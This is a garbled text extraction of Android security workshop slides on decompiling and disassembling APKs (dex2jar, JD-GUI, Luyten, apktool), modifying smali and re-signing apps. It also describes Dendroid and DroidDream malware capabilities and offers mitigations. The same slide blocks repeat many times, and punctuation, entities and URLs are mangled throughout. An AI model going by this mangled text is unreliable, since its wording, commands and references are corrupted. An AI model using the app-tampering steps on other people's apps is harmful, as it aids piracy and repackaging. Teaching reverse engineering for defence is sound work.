DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Demo Modify Smali Files
Demo
Demo
Lack of binary protection
bull At this point if you can read the source code of the application modify the behavior of the application doesnrsquot have enough protection
Techniques to mitigate the Lack of Binary Protection
Verify Sign
Obfuscated
bull Some obfuscation tool allow to encrypt String in source codendash ProGuard()ndash DexProtectorndash DexGuard
Anti-Emulator
Debuggable
Demo Time 2
Demo
Techniques to mitigate the Lack of Binary Protection
Verify Sign
Obfuscated
bull Some obfuscation tool allow to encrypt String in source codendash ProGuard()ndash DexProtectorndash DexGuard
Anti-Emulator
Debuggable
Demo Time 2
Demo
Verify Sign
Obfuscated
bull Some obfuscation tool allow to encrypt String in source codendash ProGuard()ndash DexProtectorndash DexGuard
Anti-Emulator
Debuggable
Demo Time 2
Demo
Obfuscated
bull Some obfuscation tool allow to encrypt String in source codendash ProGuard()ndash DexProtectorndash DexGuard
Anti-Emulator
Debuggable
Demo Time 2
Demo
Anti-Emulator
Debuggable
Demo Time 2
Demo
Debuggable
Demo Time 2
Demo
Demo Time 2
Demo
Demo
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Demo Modify Smali Files
Demo
Demo
Recap
bull Wersquove seen how itrsquos possible change the behavior of an app by disassembling modify the smali code and recompiling the app
bull Some techniques to ldquotryrdquo to prevent the lack of binary protection
MALWARE
Malware Statistics 1
Malware Statistics 2
Malware 1-Flappy-bird
bull Some application ask for permission that donrsquot need
bull Eg Game asking for send sms
Malware 1-Flappy-bird
bull Some application ask for permission that donrsquot need
bull Eg Game asking for send sms
Malware 2-iMatch
Permissions Dangerous 1
Permissions Dangerous 2
Dendroid botnet Botnet especially developed for attacking android userrsquos which has the functionalities like
bull Record call
bull Block SMSbull Take videophotobull Send textbull Send contactsbull Get user account
bull Call Numberbull Update Appbull Delete filesbull Get browser history bull Get call historybull Get inbox SMS
Dendroid botnet -malware
Dendroid botnet - Manifest
Demo Time
DroidDream Malware
bull Steal sensitive datandash IMEI ndashgt block phonendash IMSIndash Device modelndash SDK
DroidDream example 1 - Paint
bull Access_coarse_location==GPSbull Read_phone_state
DroidDream example 11
DroidDream example 2 ndash Hotgirls
How to Protect Yourself
bull Go to Settings rarr Security rarr Turn OFF Allow installation from unknown sources
bull Always keep an up-to-date Anti-virus appbull Avoid unknown and unsecured Wi-Fi hotspots
Summary
bull Obfuscate the code and mitigate the lack of binary protection using anti-emulatoretc
bull Be aware of what permissions yoursquore giving to the application
bull danielramirezmartingmailcom
Referencesbull httpsmanifestsecuritycomandroid-application-securitybull httpsgithubcomstrazzereanti-emulatorbull BookThe mobile hackers handbookbull BookAndroid Hackers Handbookbull httpdarkmattersnorsecorpcom20150715how-to-reverse-engineer-androi
d-applications
bull httpsblognetspicomattacking-android-applications-with-debuggersbull http
briskinfosecblogspotcouk201407apktool-for-android-security-test-inhtmlbull httpsdecompileandsecureapkwordpresscom20140510decompile-and-sec
ure-android-apk
bull httphackerz-innblogspotcouk201412android-botnet-dendroid-step-by-stephtml
- Android security workshop
- Agenda
- Android fundamentals
- Agenda (2)
- Intro
- Stats
- Android Architecture
- Linux Kernel
- Libraries
- Android Runtime
- Dalvik VM
- ART VS DVM
- Application Framework
- Application Layer
- APK how itrsquos works
- Android Application Security
- Android 60
- Defense layers
- Google Play
- Apps from Unknown Sources
- Verify Apps
- Verifying is on and visible when need
- Core security features to build secure applicaton
- Slide 24
- Links
- Application Components Security
- Android Application Security (2)
- Android Application Security (3)
- Android Application Components
- Android Application Components (2)
- Android Manifest
- Android Manifest (2)
- Android Manifest (3)
- Intents
- Drozer
- Drozer (2)
- Drozer (3)
- Activity components
- Activity components attacks
- Activity components attacks (2)
- Activity components attacks (3)
- Activity components demo
- Services
- Services attacks
- Services attacks (2)
- Content providers
- Content providers (2)
- Content providers attacks
- Content providers attacks (2)
- Content providers attacks (3)
- Content providers attacks (4)
- Content providers demo
- Broadcast receivers
- Broadcast receivers (2)
- Broadcast receivers attacks
- Broadcast receivers attacks (2)
- Broadcast receivers attacks (3)
- Broadcast receivers attacks (4)
- General defenses for App Components
- References
- Thank you
- OWASP top 10 mobile risks
- Important notes
- What are we going to talk abouthellip
- Before we starthellip the threat model
- M2 - Insecure data storage
- Insecure data storage ndash what it is
- Insecure data storage ndash what to look for
- Insecure data storage ndash how to find
- Insecure data storage - demo
- Insecure data storage ndash real example
- Insecure data storage - mitigations
- M3 - Insufficient transport layer protection
- Insufficient transport layer protection ndash what it is
- What do you mean bdquoincorrectlyrdquo
- Certificate inspection in web applications ndash chain of trust
- Cert Pinning - theory
- Cert Pinning - reality
- Insufficient transport layer protection- how to find
- Insufficient transport layer protection- example
- Insufficient transport layer protection-few facts from reality
- Insufficient transport layer protection- mitigations
- M4 - Unintended data leakage
- Unintended data leakage ndash what it is
- Unintended data leakage ndash common leakage points
- Unintended data leakage ndash how to find
- Unintended data leakage - demo
- Unintended data leakage - mitigations
- M5 - Poor Authorization and Authentication
- Poor Authorization and Authentication ndash what is it
- Poor Authorization and Authentication ndash how to find
- Poor Authorization and Authentication - demo
- Poor Authorization and Authentication ndash real example
- And always remember tohellip
- Poor Authorization and Authentication - mitigations
- M6 - Broken Cryptography
- Broken Cryptography ndash what it is
- Broken Cryptography ndash how to find
- Broken Cryptography - example
- Broken Cryptography - example (2)
- Broken Cryptography ndash real example
- Broken Cryptography - mitigations
- M7 - Client side injection
- Client side injection ndash what it is
- Client side injection ndash what to inject
- A new Androidrsquos toy ndash the Intents
- Client side injection ndash how to find
- Client side injection ndash real example
- Client side injection - mitigations
- M9 - Improper session handling
- Improper session handling ndash what it is
- Improper session handling ndash how to find
- Improper session handling ndash few facts from reality
- Improper session handling - mitigations
- Thank you
- References (2)
- Reverse Engineering amp Malware Analysis
- Anatomy of an apk
- Getting our apk file
- Decompiling || Disassembling
- Decompiling
- Decompiling-Dex2Jar
- Decompiling ndash Java Decompilers
- JD-GUI
- Luyten
- Slide 126
- Disassembling
- Disassembling (2)
- Signing apk
- Demo Time
- Demo Decompiling Luyten
- Demo Modify Smali Files
- Demo
- Lack of binary protection
- Techniques to mitigate the Lack of Binary Protection
- Verify Sign
- Obfuscated
- Anti-Emulator
- Debuggable
- Demo Time 2
- Demo
- Demo Decompiling Luyten (2)
- Demo Modify Smali Files (2)
- Demo (2)
- Recap
- Malware
- Malware Statistics 1
- Malware Statistics 2
- Malware 1-Flappy-bird
- Malware 1-Flappy-bird (2)
- Malware 2-iMatch
- Permissions Dangerous 1
- Permissions Dangerous 2
- Dendroid botnet
- Dendroid botnet -malware
- Dendroid botnet - Manifest
- Demo Time (2)
- DroidDream Malware
- DroidDream example 1 - Paint
- DroidDream example 11
- DroidDream example 2 ndash Hotgirls
- How to Protect Yourself
- Summary
- Slide 164
- Slide 165
- References (3)
-
MALWARE
Malware Statistics 1
Malware Statistics 2
Malware 1-Flappy-bird
bull Some application ask for permission that donrsquot need
bull Eg Game asking for send sms
Malware 1-Flappy-bird
bull Some application ask for permission that donrsquot need
bull Eg Game asking for send sms
Malware 2-iMatch
Permissions Dangerous 1
Permissions Dangerous 2
Dendroid botnet Botnet especially developed for attacking android userrsquos which has the functionalities like
bull Record call
bull Block SMSbull Take videophotobull Send textbull Send contactsbull Get user account
bull Call Numberbull Update Appbull Delete filesbull Get browser history bull Get call historybull Get inbox SMS
Dendroid botnet -malware
Dendroid botnet - Manifest
Demo Time
DroidDream Malware
bull Steal sensitive datandash IMEI ndashgt block phonendash IMSIndash Device modelndash SDK
DroidDream example 1 - Paint
bull Access_coarse_location==GPSbull Read_phone_state
DroidDream example 11
DroidDream example 2 ndash Hotgirls
How to Protect Yourself
bull Go to Settings rarr Security rarr Turn OFF Allow installation from unknown sources
bull Always keep an up-to-date Anti-virus appbull Avoid unknown and unsecured Wi-Fi hotspots
Summary
bull Obfuscate the code and mitigate the lack of binary protection using anti-emulatoretc
bull Be aware of what permissions yoursquore giving to the application
bull danielramirezmartingmailcom
Referencesbull httpsmanifestsecuritycomandroid-application-securitybull httpsgithubcomstrazzereanti-emulatorbull BookThe mobile hackers handbookbull BookAndroid Hackers Handbookbull httpdarkmattersnorsecorpcom20150715how-to-reverse-engineer-androi
d-applications
bull httpsblognetspicomattacking-android-applications-with-debuggersbull http
briskinfosecblogspotcouk201407apktool-for-android-security-test-inhtmlbull httpsdecompileandsecureapkwordpresscom20140510decompile-and-sec
ure-android-apk
bull httphackerz-innblogspotcouk201412android-botnet-dendroid-step-by-stephtml
- Android security workshop
- Agenda
- Android fundamentals
- Agenda (2)
- Intro
- Stats
- Android Architecture
- Linux Kernel
- Libraries
- Android Runtime
- Dalvik VM
- ART VS DVM
- Application Framework
- Application Layer
- APK how itrsquos works
- Android Application Security
- Android 60
- Defense layers
- Google Play
- Apps from Unknown Sources
- Verify Apps
- Verifying is on and visible when need
- Core security features to build secure applicaton
- Slide 24
- Links
- Application Components Security
- Android Application Security (2)
- Android Application Security (3)
- Android Application Components
- Android Application Components (2)
- Android Manifest
- Android Manifest (2)
- Android Manifest (3)
- Intents
- Drozer
- Drozer (2)
- Drozer (3)
- Activity components
- Activity components attacks
- Activity components attacks (2)
- Activity components attacks (3)
- Activity components demo
- Services
- Services attacks
- Services attacks (2)
- Content providers
- Content providers (2)
- Content providers attacks
- Content providers attacks (2)
- Content providers attacks (3)
- Content providers attacks (4)
- Content providers demo
- Broadcast receivers
- Broadcast receivers (2)
- Broadcast receivers attacks
- Broadcast receivers attacks (2)
- Broadcast receivers attacks (3)
- Broadcast receivers attacks (4)
- General defenses for App Components
- References
- Thank you
- OWASP top 10 mobile risks
- Important notes
- What are we going to talk abouthellip
- Before we starthellip the threat model
- M2 - Insecure data storage
- Insecure data storage ndash what it is
- Insecure data storage ndash what to look for
- Insecure data storage ndash how to find
- Insecure data storage - demo
- Insecure data storage ndash real example
- Insecure data storage - mitigations
- M3 - Insufficient transport layer protection
- Insufficient transport layer protection ndash what it is
- What do you mean bdquoincorrectlyrdquo
- Certificate inspection in web applications ndash chain of trust
- Cert Pinning - theory
- Cert Pinning - reality
- Insufficient transport layer protection- how to find
- Insufficient transport layer protection- example
- Insufficient transport layer protection-few facts from reality
- Insufficient transport layer protection- mitigations
- M4 - Unintended data leakage
- Unintended data leakage ndash what it is
- Unintended data leakage ndash common leakage points
- Unintended data leakage ndash how to find
- Unintended data leakage - demo
- Unintended data leakage - mitigations
- M5 - Poor Authorization and Authentication
- Poor Authorization and Authentication ndash what is it
- Poor Authorization and Authentication ndash how to find
- Poor Authorization and Authentication - demo
- Poor Authorization and Authentication ndash real example
- And always remember tohellip
- Poor Authorization and Authentication - mitigations
- M6 - Broken Cryptography
- Broken Cryptography ndash what it is
- Broken Cryptography ndash how to find
- Broken Cryptography - example
- Broken Cryptography - example (2)
- Broken Cryptography ndash real example
- Broken Cryptography - mitigations
- M7 - Client side injection
- Client side injection ndash what it is
- Client side injection ndash what to inject
- A new Androidrsquos toy ndash the Intents
- Client side injection ndash how to find
- Client side injection ndash real example
- Client side injection - mitigations
- M9 - Improper session handling
- Improper session handling ndash what it is
- Improper session handling ndash how to find
- Improper session handling ndash few facts from reality
- Improper session handling - mitigations
- Thank you
- References (2)
- Reverse Engineering amp Malware Analysis
- Anatomy of an apk
- Getting our apk file
- Decompiling || Disassembling
- Decompiling
- Decompiling-Dex2Jar
- Decompiling ndash Java Decompilers
- JD-GUI
- Luyten
- Slide 126
- Disassembling
- Disassembling (2)
- Signing apk
- Demo Time
- Demo Decompiling Luyten
- Demo Modify Smali Files
- Demo
- Lack of binary protection
- Techniques to mitigate the Lack of Binary Protection
- Verify Sign
- Obfuscated
- Anti-Emulator
- Debuggable
- Demo Time 2
- Demo
- Demo Decompiling Luyten (2)
- Demo Modify Smali Files (2)
- Demo (2)
- Recap
- Malware
- Malware Statistics 1
- Malware Statistics 2
- Malware 1-Flappy-bird
- Malware 1-Flappy-bird (2)
- Malware 2-iMatch
- Permissions Dangerous 1
- Permissions Dangerous 2
- Dendroid botnet
- Dendroid botnet -malware
- Dendroid botnet - Manifest
- Demo Time (2)
- DroidDream Malware
- DroidDream example 1 - Paint
- DroidDream example 11
- DroidDream example 2 ndash Hotgirls
- How to Protect Yourself
- Summary
- Slide 164
- Slide 165
- References (3)
-
Malware Statistics 1
Malware Statistics 2
Malware 1-Flappy-bird
bull Some application ask for permission that donrsquot need
bull Eg Game asking for send sms
Malware 1-Flappy-bird
bull Some application ask for permission that donrsquot need
bull Eg Game asking for send sms
Malware 2-iMatch
Permissions Dangerous 1
Permissions Dangerous 2
Dendroid botnet Botnet especially developed for attacking android userrsquos which has the functionalities like
bull Record call
bull Block SMSbull Take videophotobull Send textbull Send contactsbull Get user account
bull Call Numberbull Update Appbull Delete filesbull Get browser history bull Get call historybull Get inbox SMS
Dendroid botnet -malware
Dendroid botnet - Manifest
Demo Time
DroidDream Malware
bull Steal sensitive datandash IMEI ndashgt block phonendash IMSIndash Device modelndash SDK
DroidDream example 1 - Paint
bull Access_coarse_location==GPSbull Read_phone_state
DroidDream example 11
DroidDream example 2 ndash Hotgirls
How to Protect Yourself
bull Go to Settings rarr Security rarr Turn OFF Allow installation from unknown sources
bull Always keep an up-to-date Anti-virus appbull Avoid unknown and unsecured Wi-Fi hotspots
Summary
bull Obfuscate the code and mitigate the lack of binary protection using anti-emulatoretc
bull Be aware of what permissions yoursquore giving to the application
bull danielramirezmartingmailcom
Referencesbull httpsmanifestsecuritycomandroid-application-securitybull httpsgithubcomstrazzereanti-emulatorbull BookThe mobile hackers handbookbull BookAndroid Hackers Handbookbull httpdarkmattersnorsecorpcom20150715how-to-reverse-engineer-androi
d-applications
bull httpsblognetspicomattacking-android-applications-with-debuggersbull http
briskinfosecblogspotcouk201407apktool-for-android-security-test-inhtmlbull httpsdecompileandsecureapkwordpresscom20140510decompile-and-sec
ure-android-apk
bull httphackerz-innblogspotcouk201412android-botnet-dendroid-step-by-stephtml
- Android security workshop
- Agenda
- Android fundamentals
- Agenda (2)
- Intro
- Stats
- Android Architecture
- Linux Kernel
- Libraries
- Android Runtime
- Dalvik VM
- ART VS DVM
- Application Framework
- Application Layer
- APK how itrsquos works
- Android Application Security
- Android 60
- Defense layers
- Google Play
- Apps from Unknown Sources
- Verify Apps
- Verifying is on and visible when need
- Core security features to build secure applicaton
- Slide 24
- Links
- Application Components Security
- Android Application Security (2)
- Android Application Security (3)
- Android Application Components
- Android Application Components (2)
- Android Manifest
- Android Manifest (2)
- Android Manifest (3)
- Intents
- Drozer
- Drozer (2)
- Drozer (3)
- Activity components
- Activity components attacks
- Activity components attacks (2)
- Activity components attacks (3)
- Activity components demo
- Services
- Services attacks
- Services attacks (2)
- Content providers
- Content providers (2)
- Content providers attacks
- Content providers attacks (2)
- Content providers attacks (3)
- Content providers attacks (4)
- Content providers demo
- Broadcast receivers
- Broadcast receivers (2)
- Broadcast receivers attacks
- Broadcast receivers attacks (2)
- Broadcast receivers attacks (3)
- Broadcast receivers attacks (4)
- General defenses for App Components
- References
- Thank you
- OWASP top 10 mobile risks
- Important notes
- What are we going to talk abouthellip
- Before we starthellip the threat model
- M2 - Insecure data storage
- Insecure data storage ndash what it is
- Insecure data storage ndash what to look for
- Insecure data storage ndash how to find
- Insecure data storage - demo
- Insecure data storage ndash real example
- Insecure data storage - mitigations
- M3 - Insufficient transport layer protection
- Insufficient transport layer protection ndash what it is
- What do you mean bdquoincorrectlyrdquo
- Certificate inspection in web applications ndash chain of trust
- Cert Pinning - theory
- Cert Pinning - reality
- Insufficient transport layer protection- how to find
- Insufficient transport layer protection- example
- Insufficient transport layer protection-few facts from reality
- Insufficient transport layer protection- mitigations
- M4 - Unintended data leakage
- Unintended data leakage ndash what it is
- Unintended data leakage ndash common leakage points
- Unintended data leakage ndash how to find
- Unintended data leakage - demo
- Unintended data leakage - mitigations
- M5 - Poor Authorization and Authentication
- Poor Authorization and Authentication ndash what is it
- Poor Authorization and Authentication ndash how to find
- Poor Authorization and Authentication - demo
- Poor Authorization and Authentication ndash real example
- And always remember tohellip
- Poor Authorization and Authentication - mitigations
- M6 - Broken Cryptography
- Broken Cryptography ndash what it is
- Broken Cryptography ndash how to find
- Broken Cryptography - example
- Broken Cryptography - example (2)
- Broken Cryptography ndash real example
- Broken Cryptography - mitigations
- M7 - Client side injection
- Client side injection ndash what it is
- Client side injection ndash what to inject
- A new Androidrsquos toy ndash the Intents
- Client side injection ndash how to find
- Client side injection ndash real example
- Client side injection - mitigations
- M9 - Improper session handling
- Improper session handling ndash what it is
- Improper session handling ndash how to find
- Improper session handling ndash few facts from reality
- Improper session handling - mitigations
- Thank you
- References (2)
- Reverse Engineering amp Malware Analysis
- Anatomy of an apk
- Getting our apk file
- Decompiling || Disassembling
- Decompiling
- Decompiling-Dex2Jar
- Decompiling ndash Java Decompilers
- JD-GUI
- Luyten
- Slide 126
- Disassembling
- Disassembling (2)
- Signing apk
- Demo Time
- Demo Decompiling Luyten
- Demo Modify Smali Files
- Demo
- Lack of binary protection
- Techniques to mitigate the Lack of Binary Protection
- Verify Sign
- Obfuscated
- Anti-Emulator
- Debuggable
- Demo Time 2
- Demo
- Demo Decompiling Luyten (2)
- Demo Modify Smali Files (2)
- Demo (2)
- Recap
- Malware
- Malware Statistics 1
- Malware Statistics 2
- Malware 1-Flappy-bird
- Malware 1-Flappy-bird (2)
- Malware 2-iMatch
- Permissions Dangerous 1
- Permissions Dangerous 2
- Dendroid botnet
- Dendroid botnet -malware
- Dendroid botnet - Manifest
- Demo Time (2)
- DroidDream Malware
- DroidDream example 1 - Paint
- DroidDream example 11
- DroidDream example 2 ndash Hotgirls
- How to Protect Yourself
- Summary
- Slide 164
- Slide 165
- References (3)
-
Malware Statistics 2
Malware 1-Flappy-bird
bull Some application ask for permission that donrsquot need
bull Eg Game asking for send sms
Malware 1-Flappy-bird
bull Some application ask for permission that donrsquot need
bull Eg Game asking for send sms
Malware 2-iMatch
Permissions Dangerous 1
Permissions Dangerous 2
Dendroid botnet Botnet especially developed for attacking android userrsquos which has the functionalities like
bull Record call
bull Block SMSbull Take videophotobull Send textbull Send contactsbull Get user account
bull Call Numberbull Update Appbull Delete filesbull Get browser history bull Get call historybull Get inbox SMS
Dendroid botnet -malware
Dendroid botnet - Manifest
Demo Time
DroidDream Malware
bull Steal sensitive datandash IMEI ndashgt block phonendash IMSIndash Device modelndash SDK
DroidDream example 1 - Paint
bull Access_coarse_location==GPSbull Read_phone_state
DroidDream example 11
DroidDream example 2 ndash Hotgirls
How to Protect Yourself
bull Go to Settings rarr Security rarr Turn OFF Allow installation from unknown sources
bull Always keep an up-to-date Anti-virus appbull Avoid unknown and unsecured Wi-Fi hotspots
Summary
bull Obfuscate the code and mitigate the lack of binary protection using anti-emulatoretc
bull Be aware of what permissions yoursquore giving to the application
bull danielramirezmartingmailcom
Referencesbull httpsmanifestsecuritycomandroid-application-securitybull httpsgithubcomstrazzereanti-emulatorbull BookThe mobile hackers handbookbull BookAndroid Hackers Handbookbull httpdarkmattersnorsecorpcom20150715how-to-reverse-engineer-androi
d-applications
bull httpsblognetspicomattacking-android-applications-with-debuggersbull http
briskinfosecblogspotcouk201407apktool-for-android-security-test-inhtmlbull httpsdecompileandsecureapkwordpresscom20140510decompile-and-sec
ure-android-apk
bull httphackerz-innblogspotcouk201412android-botnet-dendroid-step-by-stephtml
- Android security workshop
- Agenda
- Android fundamentals
- Agenda (2)
- Intro
- Stats
- Android Architecture
- Linux Kernel
- Libraries
- Android Runtime
- Dalvik VM
- ART VS DVM
- Application Framework
- Application Layer
- APK how itrsquos works
- Android Application Security
- Android 60
- Defense layers
- Google Play
- Apps from Unknown Sources
- Verify Apps
- Verifying is on and visible when need
- Core security features to build secure applicaton
- Slide 24
- Links
- Application Components Security
- Android Application Security (2)
- Android Application Security (3)
- Android Application Components
- Android Application Components (2)
- Android Manifest
- Android Manifest (2)
- Android Manifest (3)
- Intents
- Drozer
- Drozer (2)
- Drozer (3)
- Activity components
- Activity components attacks
- Activity components attacks (2)
- Activity components attacks (3)
- Activity components demo
- Services
- Services attacks
- Services attacks (2)
- Content providers
- Content providers (2)
- Content providers attacks
- Content providers attacks (2)
- Content providers attacks (3)
- Content providers attacks (4)
- Content providers demo
- Broadcast receivers
- Broadcast receivers (2)
- Broadcast receivers attacks
- Broadcast receivers attacks (2)
- Broadcast receivers attacks (3)
- Broadcast receivers attacks (4)
- General defenses for App Components
- References
- Thank you
- OWASP top 10 mobile risks
- Important notes
- What are we going to talk abouthellip
- Before we starthellip the threat model
- M2 - Insecure data storage
- Insecure data storage ndash what it is
- Insecure data storage ndash what to look for
- Insecure data storage ndash how to find
- Insecure data storage - demo
- Insecure data storage ndash real example
- Insecure data storage - mitigations
- M3 - Insufficient transport layer protection
- Insufficient transport layer protection ndash what it is
- What do you mean bdquoincorrectlyrdquo
- Certificate inspection in web applications ndash chain of trust
- Cert Pinning - theory
- Cert Pinning - reality
- Insufficient transport layer protection- how to find
- Insufficient transport layer protection- example
- Insufficient transport layer protection-few facts from reality
- Insufficient transport layer protection- mitigations
- M4 - Unintended data leakage
- Unintended data leakage ndash what it is
- Unintended data leakage ndash common leakage points
- Unintended data leakage ndash how to find
- Unintended data leakage - demo
- Unintended data leakage - mitigations
- M5 - Poor Authorization and Authentication
- Poor Authorization and Authentication ndash what is it
- Poor Authorization and Authentication ndash how to find
- Poor Authorization and Authentication - demo
- Poor Authorization and Authentication ndash real example
- And always remember tohellip
- Poor Authorization and Authentication - mitigations
- M6 - Broken Cryptography
- Broken Cryptography ndash what it is
- Broken Cryptography ndash how to find
- Broken Cryptography - example
- Broken Cryptography - example (2)
- Broken Cryptography ndash real example
- Broken Cryptography - mitigations
- M7 - Client side injection
- Client side injection ndash what it is
- Client side injection ndash what to inject
- A new Androidrsquos toy ndash the Intents
- Client side injection ndash how to find
- Client side injection ndash real example
- Client side injection - mitigations
- M9 - Improper session handling
- Improper session handling ndash what it is
- Improper session handling ndash how to find
- Improper session handling ndash few facts from reality
- Improper session handling - mitigations
- Thank you
- References (2)
- Reverse Engineering amp Malware Analysis
- Anatomy of an apk
- Getting our apk file
- Decompiling || Disassembling
- Decompiling
- Decompiling-Dex2Jar
- Decompiling ndash Java Decompilers
- JD-GUI
- Luyten
- Slide 126
- Disassembling
- Disassembling (2)
- Signing apk
- Demo Time
- Demo Decompiling Luyten
- Demo Modify Smali Files
- Demo
- Lack of binary protection
- Techniques to mitigate the Lack of Binary Protection
- Verify Sign
- Obfuscated
- Anti-Emulator
- Debuggable
- Demo Time 2
- Demo
- Demo Decompiling Luyten (2)
- Demo Modify Smali Files (2)
- Demo (2)
- Recap
- Malware
- Malware Statistics 1
- Malware Statistics 2
- Malware 1-Flappy-bird
- Malware 1-Flappy-bird (2)
- Malware 2-iMatch
- Permissions Dangerous 1
- Permissions Dangerous 2
- Dendroid botnet
- Dendroid botnet -malware
- Dendroid botnet - Manifest
- Demo Time (2)
- DroidDream Malware
- DroidDream example 1 - Paint
- DroidDream example 11
- DroidDream example 2 ndash Hotgirls
- How to Protect Yourself
- Summary
- Slide 164
- Slide 165
- References (3)
-
Malware 1-Flappy-bird
bull Some application ask for permission that donrsquot need
bull Eg Game asking for send sms
Malware 1-Flappy-bird
bull Some application ask for permission that donrsquot need
bull Eg Game asking for send sms
Malware 2-iMatch
Permissions Dangerous 1
Permissions Dangerous 2
Dendroid botnet Botnet especially developed for attacking android userrsquos which has the functionalities like
bull Record call
bull Block SMSbull Take videophotobull Send textbull Send contactsbull Get user account
bull Call Numberbull Update Appbull Delete filesbull Get browser history bull Get call historybull Get inbox SMS
Dendroid botnet -malware
Dendroid botnet - Manifest
Demo Time
DroidDream Malware
bull Steal sensitive datandash IMEI ndashgt block phonendash IMSIndash Device modelndash SDK
DroidDream example 1 - Paint
bull Access_coarse_location==GPSbull Read_phone_state
DroidDream example 11
DroidDream example 2 ndash Hotgirls
How to Protect Yourself
bull Go to Settings rarr Security rarr Turn OFF Allow installation from unknown sources
bull Always keep an up-to-date Anti-virus appbull Avoid unknown and unsecured Wi-Fi hotspots
Summary
bull Obfuscate the code and mitigate the lack of binary protection using anti-emulatoretc
bull Be aware of what permissions yoursquore giving to the application
bull danielramirezmartingmailcom
Referencesbull httpsmanifestsecuritycomandroid-application-securitybull httpsgithubcomstrazzereanti-emulatorbull BookThe mobile hackers handbookbull BookAndroid Hackers Handbookbull httpdarkmattersnorsecorpcom20150715how-to-reverse-engineer-androi
d-applications
bull httpsblognetspicomattacking-android-applications-with-debuggersbull http
